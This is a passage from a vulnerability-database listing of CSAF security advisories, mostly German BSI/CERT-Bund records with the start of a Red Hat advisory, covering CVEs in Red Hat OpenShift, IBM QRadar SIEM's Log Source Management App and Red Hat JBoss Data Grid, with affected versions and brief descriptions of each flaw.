[ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-43796", }, { cve: "CVE-2024-43799", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in Red Hat OpenShift. Diese Fehler betreffen Express, die Send-Bibliothek und die Serve-static-Komponente aufgrund einer unsachgemäßen Eingabevalidierung in bestimmten Funktionen. Ein entfernter, anonymer Angreifer kann diese Schwachstellen zur Ausführung von beliebigem Code ausnutzen. Eine erfolgreiche Ausnutzung erfordert eine Benutzerinteraktion.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-43799", }, { cve: "CVE-2024-43800", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in Red Hat OpenShift. Diese Fehler betreffen Express, die Send-Bibliothek und die Serve-static-Komponente aufgrund einer unsachgemäßen Eingabevalidierung in bestimmten Funktionen. Ein entfernter, anonymer Angreifer kann diese Schwachstellen zur Ausführung von beliebigem Code ausnutzen. Eine erfolgreiche Ausnutzung erfordert eine Benutzerinteraktion.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-43800", }, { cve: "CVE-2024-45296", notes: [ { category: "description", text: "Es besteht eine Schwachstelle in Red Hat OpenShift aufgrund einer ineffizienten Generierung regulärer Ausdrücke im path-to-regexp-Paket. Bestimmte Pfadzeichenfolgen können zu komplexen regulären Ausdrücken führen, die die Leistung beeinträchtigen und die Ereignisschleife blockieren. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-45296", }, { cve: "CVE-2024-45590", notes: [ { category: "description", text: "Es besteht eine Schwachstelle in Red Hat OpenShift aufgrund einer unsachgemäßen Behandlung von URL-kodierten Payloads im Modul body-parser. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen, indem er eine manipulierte Payload sendet, wenn die URL-Kodierung aktiviert ist.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-45590", }, { cve: "CVE-2024-45801", notes: [ { category: "description", text: "In Red Hat OpenShift existiert eine Cross-Site Scripting Schwachstelle. HTML und Script-Eingaben werden in DOMPurify nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstelle beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen. Die Sicherheitslücke erfordert die Umgehung von Depth Checks durch Nesting-Techniken und die Ausnutzung von Prototype Pollution.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-45801", }, ], }
wid-sec-w-2025-0043
Vulnerability from csaf_certbund
Published
2025-01-12 23:00
Modified
2025-01-12 23:00
Summary
IBM QRadar SIEM (Log Source Management App): Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM QRadar Security Information and Event Management (SIEM) bietet Unterstützung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.
Angriff
Ein entfernter anonymer Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um einen Cross-Site-Scripting-Angriff zu starten, beliebigen Code auszuführen, einen Denial-of-Service-Zustand zu erzeugen, Daten zu manipulieren, vertrauliche Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
{ document: { aggregate_severity: { text: "hoch", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "IBM QRadar Security Information and Event Management (SIEM) bietet Unterstützung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter anonymer Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um einen Cross-Site-Scripting-Angriff zu starten, beliebigen Code auszuführen, einen Denial-of-Service-Zustand zu erzeugen, Daten zu manipulieren, vertrauliche Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.", title: "Angriff", }, { category: "general", text: "- Sonstiges\n- UNIX", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2025-0043 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0043.json", }, { category: "self", summary: "WID-SEC-2025-0043 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0043", }, { category: "external", summary: "IBM Security Bulletin vom 2025-01-12", url: "https://www.ibm.com/support/pages/node/7180725", }, ], source_lang: "en-US", title: "IBM QRadar SIEM (Log Source Management App): Mehrere Schwachstellen", tracking: { current_release_date: "2025-01-12T23:00:00.000+00:00", generator: { date: "2025-01-13T09:08:15.486+00:00", engine: { name: "BSI-WID", version: "1.3.10", }, }, id: "WID-SEC-W-2025-0043", initial_release_date: "2025-01-12T23:00:00.000+00:00", revision_history: [ { date: "2025-01-12T23:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version_range", name: "Log Source Management App <7.0.11", product: { name: "IBM QRadar SIEM Log Source Management App <7.0.11", product_id: "T040117", }, }, { category: "product_version", name: "Log Source Management App 7.0.11", product: { name: "IBM QRadar SIEM Log Source Management App 7.0.11", product_id: "T040117-fixed", product_identification_helper: { cpe: "cpe:/a:ibm:qradar_siem:log_source_management_app__7.0.11", }, }, }, ], category: "product_name", name: "QRadar SIEM", }, ], category: "vendor", name: "IBM", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", notes: [ { category: "description", text: "In IBM QRadar SIEM Log Source Management App existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-43788", }, { cve: "CVE-2024-43796", notes: [ { category: "description", text: "In IBM QRadar SIEM Log Source Management App existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-43796", }, { cve: "CVE-2024-43799", notes: [ { category: "description", text: "In IBM QRadar SIEM Log Source Management App existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-43799", }, { cve: "CVE-2024-43800", notes: [ { category: "description", text: "In IBM QRadar SIEM Log Source Management App existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-43800", }, { cve: "CVE-2024-47068", notes: [ { category: "description", text: "In IBM QRadar SIEM Log Source Management App existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-47068", }, { cve: "CVE-2024-47875", notes: [ { category: "description", text: "In IBM QRadar SIEM Log Source Management App existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-47875", }, { cve: "CVE-2024-21536", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-21536", }, { cve: "CVE-2024-21538", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-21538", }, { cve: "CVE-2024-33883", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-33883", }, { cve: "CVE-2024-37890", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-37890", }, { cve: "CVE-2024-4067", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-4067", }, { cve: "CVE-2024-4068", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-4068", }, { cve: "CVE-2024-45296", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-45296", }, { cve: "CVE-2024-45590", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-45590", }, { cve: "CVE-2024-48948", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-48948", }, { cve: "CVE-2024-48949", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-48949", }, { cve: "CVE-2024-52798", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-52798", }, { cve: "CVE-2024-55565", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App. Diese Schwachstellen bestehen in mehreren Modulen und Bibliotheken wie Node.js, dem expressjs body-parser oder nanoid aufgrund von Problemen wie unsachgemäßer Eingabebereinigung, Regular Expression Backtracking, Null-Pointer-Dereferenzen, Memory Exhaustion und unsachgemäßer Behandlung von nicht ganzzahligen Werten. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-55565", }, { cve: "CVE-2024-45801", notes: [ { category: "description", text: "Es besteht eine Schwachstelle in IBM QRadar SIEM Log Source Management App. Diese Schwachstelle betrifft DOMPurify aufgrund eines Prototyp-Verschmutzungsfehlers in der Tiefenprüfung. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um beliebigen Code auszuführen oder einen Denial-of-Service-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-45801", }, { cve: "CVE-2024-42459", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App . Diese Schwachstellen betreffen das Node.js Elliptic-Modul aufgrund fehlender Überprüfungen und unsachgemäßer Behandlung von BER-codierten Signaturen. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um vertrauliche Informationen offenzulegen und weitere Angriffe zu starten.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-42459", }, { cve: "CVE-2024-42460", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App . Diese Schwachstellen betreffen das Node.js Elliptic-Modul aufgrund fehlender Überprüfungen und unsachgemäßer Behandlung von BER-codierten Signaturen. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um vertrauliche Informationen offenzulegen und weitere Angriffe zu starten.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-42460", }, { cve: "CVE-2024-42461", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in IBM QRadar SIEM Log Source Management App . Diese Schwachstellen betreffen das Node.js Elliptic-Modul aufgrund fehlender Überprüfungen und unsachgemäßer Behandlung von BER-codierten Signaturen. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um vertrauliche Informationen offenzulegen und weitere Angriffe zu starten.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-42461", }, { cve: "CVE-2024-47764", notes: [ { category: "description", text: "Es besteht eine Schwachstelle in IBM QRadar SIEM Log Source Management App. Diese Schwachstelle betrifft das jshttp-Cookie aufgrund einer unsachgemäßen Eingabevalidierung von Cookie-Name, -Pfad und -Domäne. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um Sicherheitsbeschränkungen zu umgehen und andere Felder des Cookies zu ändern.", }, ], product_status: { known_affected: [ "T040117", ], }, release_date: "2025-01-12T23:00:00.000+00:00", title: "CVE-2024-47764", }, ], }
wid-sec-w-2024-3544
Vulnerability from csaf_certbund
Published
2024-11-25 23:00
Modified
2024-12-22 23:00
Summary
Red Hat JBoss Data Grid: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat JBoss Data Grid ist eine verteilte In-Memory-Datenbank für den schnellen Zugriff auf große Datenvolumen und Skalierbarkeit.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat JBoss Data Grid ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen und um einen Denial-of-Service-Zustand zu erzeugen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{ document: { aggregate_severity: { text: "mittel", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Red Hat JBoss Data Grid ist eine verteilte In-Memory-Datenbank für den schnellen Zugriff auf große Datenvolumen und Skalierbarkeit.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat JBoss Data Grid ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen und um einen Denial-of-Service-Zustand zu erzeugen.", title: "Angriff", }, { category: "general", text: "- Sonstiges\n- UNIX\n- Windows", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2024-3544 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3544.json", }, { category: "self", summary: "WID-SEC-2024-3544 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3544", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10214 vom 2024-11-25", url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "external", summary: "Amazon Linux Security Advisory ALAS-2024-2707 vom 2024-12-20", url: "https://alas.aws.amazon.com/AL2/ALAS-2024-2707.html", }, { category: "external", summary: "Debian Security Advisory DLA-4001 vom 2024-12-21", url: "https://lists.debian.org/debian-lts-announce/2024/12/msg00023.html", }, ], source_lang: "en-US", title: "Red Hat JBoss Data Grid: Mehrere Schwachstellen", tracking: { current_release_date: "2024-12-22T23:00:00.000+00:00", generator: { date: "2024-12-23T09:12:30.409+00:00", engine: { name: "BSI-WID", version: "1.3.10", }, }, id: "WID-SEC-W-2024-3544", initial_release_date: "2024-11-25T23:00:00.000+00:00", revision_history: [ { date: "2024-11-25T23:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2024-12-19T23:00:00.000+00:00", number: "2", summary: "Neue Updates von Amazon aufgenommen", }, { date: "2024-12-22T23:00:00.000+00:00", number: "3", summary: "Neue Updates von Debian aufgenommen", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "Amazon Linux 2", product: { name: "Amazon Linux 2", product_id: "398363", product_identification_helper: { cpe: "cpe:/o:amazon:linux_2:-", }, }, }, ], category: "vendor", name: "Amazon", }, { branches: [ { category: "product_name", name: "Debian Linux", product: { name: "Debian Linux", product_id: "2951", product_identification_helper: { cpe: "cpe:/o:debian:debian_linux:-", }, }, }, ], category: "vendor", name: "Debian", }, { branches: [ { branches: [ { category: "product_version_range", name: "<8.5.2", product: { name: "Red Hat JBoss Data Grid <8.5.2", product_id: "T039428", }, }, { category: "product_version", name: "8.5.2", product: { name: "Red Hat JBoss Data Grid 8.5.2", product_id: "T039428-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:jboss_data_grid:8.5.2", }, }, }, ], category: "product_name", name: "JBoss Data Grid", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", notes: [ { category: "description", text: "In Red Hat JBoss Data Grid existiert eine Cross-Site Scripting Schwachstelle. HTML und Script-Eingaben werden in Webpack nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstelle beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen. Zur erfolgreichen Ausnutzung ist eine Benutzeraktion erforderlich. Für eine erfolgreiche Ausnutzung müssen bestimmte Bedingungen erfüllt sein. DOM-Clobbering kann nur in Szenarien ausgenutzt werden, in denen ein Angreifer nicht sanitisierte HTML-Attribute einfügen kann.", }, ], product_status: { known_affected: [ "2951", "T039428", "398363", ], }, release_date: "2024-11-25T23:00:00.000+00:00", title: "CVE-2024-43788", }, { cve: "CVE-2024-47072", notes: [ { category: "description", text: "Es besteht eine Schwachstelle in Red Hat JBoss Data Grid. Dieser Fehler betrifft die XStream-Bibliothek aufgrund einer unsachgemäßen Behandlung von binären Input-Streams, wenn sie für die Verwendung des BinaryStreamDriver konfiguriert ist, was eine Unterbrechung des Dienstes ermöglicht. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen, indem er einen bösartigen binären Eingabestrom erstellt, um einen Stack Overflow auszulösen.", }, ], product_status: { known_affected: [ "2951", "T039428", "398363", ], }, release_date: "2024-11-25T23:00:00.000+00:00", title: "CVE-2024-47072", }, ], }
rhsa-2024:10214
Vulnerability from csaf_redhat
Published
2024-11-25 16:56
Modified
2025-04-09 20:59
Summary
Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update
Notes
Topic
An update for Red Hat Data Grid 8 is now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.
Data Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].
Security Fix(es):
* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)
* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for Red Hat Data Grid 8 is now available.\n \nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].\n\nSecurity Fix(es):\n\n* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)\n\n* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International 